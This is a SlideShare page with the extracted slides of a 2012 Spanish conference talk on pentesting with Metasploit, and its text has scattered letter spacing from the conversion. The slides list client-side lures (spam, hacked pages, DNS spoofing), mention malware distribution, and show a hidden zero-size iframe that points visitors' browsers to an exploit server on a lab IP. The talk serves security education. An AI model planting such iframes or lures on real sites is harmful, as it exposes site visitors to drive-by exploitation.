O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.

Pentesting con metasploit framework

866 visualizações

Publicada em

Charla impartida por Pablo González, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.

Publicada em: Tecnologia
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Pentesting con metasploit framework

  1. 1. Pe n t e s t i n g c o n Me t a s p l o i t F r a me w o r k Pablo González
  2. 2. ¿Qué e sMe t a s p l o i t ?Es e l c a o s , p u r o y b e l l o p o rf u e r a , e t e r n o y c o mp l e j o p o rd e n t r o , e s p u r o p e n t e s t i n g …
  3. 3. Ag e n d a1. A r q u i t e c t u r a d e Me t a s p l o i t2. Fases de un test de intrusión3. ¿Dónde p a r t i c i p a Me t a s p l o i t ?4. El arte de la intrusión5. El bien y el mal…6. D e m o7. L a t i e n d a e n c a s a
  4. 4. Ar q u i te c t u r a ?
  5. 5. Fases Test Intrusión
  6. 6. Fa s e sAlcance y términos del test de intrusiónRecolección de informaciónAnálisis d e v u l n e r a b i l i d a d e sExplotación d e v u l n e r a b i l i d a d e sPost-Explotación d e l s i s t e m aGeneración d e i n f o r m e s
  7. 7. ¿Dóndep a r t i c i p a ?
  8. 8. Lo importante es…P a r t i c i p a r !!!Recolección de informaciónAnálisis d e v u l n e r a b i l i d a d e sExplotación d e v u l n e r a b i l i d a d e sPost-ExplotaciónPero incluso… a y u d a a
  9. 9. El arte de la intrusión
  10. 10. ¿Arte o Ingeniería? Pr o c e d u r e p e n t e s t i n g ; B E GI N wr i t e l n („p a s o 1‟) wr i t e l n („p a s o 2‟) … a r t e ; END; Pr o c e d u r e a r t e ; …
  11. 11. ÁmbitoExplotación vulnerabilidades (pero…)B e s t a n d Wo r s tPr a c t i c e s
  12. 12. Elección d e l p a y l o a dMás d e 200 p a y l o a d s …Son nuestras cartas… ¿Siempreu s a r e mo s a l r e y ?
  13. 13. Tipos de Intrusión¿Cómo l a n z o l o se x p l o i t s ? Sin Interacción… (t e r r o r !) Con Interacción… (c l i e n t -s i d e a t t a c k !)
  14. 14. Cl i e n t Si d e At t a c k !D a r k S h a d o w s , ¿Cómo hago paraque hagan peticiones a mí?M a i l i n g ? (s p a m ? ? ) Foros… Páginas w e b h a c k e a d a s …P u b l i c a c i o n e s e n I n t e r n e tA c o r t a d o r e s …A t a q u e s l o c a l e s (D N S Sp o o f )
  15. 15. El bien y el mal…
  16. 16. El límiteDebemos ser éticos… ¿Lo s o m o s ?La delgada línea…P o d e mo s u t i l i z a r l o sa t a q u e s c l i e n t -s i d ep a r a : (m u c h a s , m u c h a sc o s a s ) Distribución malware… P a y l o a d s p e r ma n e n t e s
  17. 17. D e mo : Aj u g a r !
  18. 18. ¿Qué v a m o s a h a c e r ?Escenario: (idea del mundo real… ^ ^ )1. Página h a c k e a d a …2. I f r a m e q u e a p u n t e a 1 s e r v e r c o n MS F3. L a n z a m i e n t o d e e x p l o i t s c o n t r a c l i e n t e4. Obtenemos el control…
  19. 19. I f r a me …<i f r a m es r c =h t t p ://192.168.56.101:8080/ w i d t h =0 h e i g h t =0s t y l e =“h i d d e n ”f r a m e b o r d e r =0m a r g i n h e i g h t =0m a r g i n w i d t h =0/>
  20. 20. L a t i e n d a e n c a s a
  21. 21. He tenido el honor……y han tenido la paciencia…Me t a s p l o i t p a r aPe n t e s t e r s

×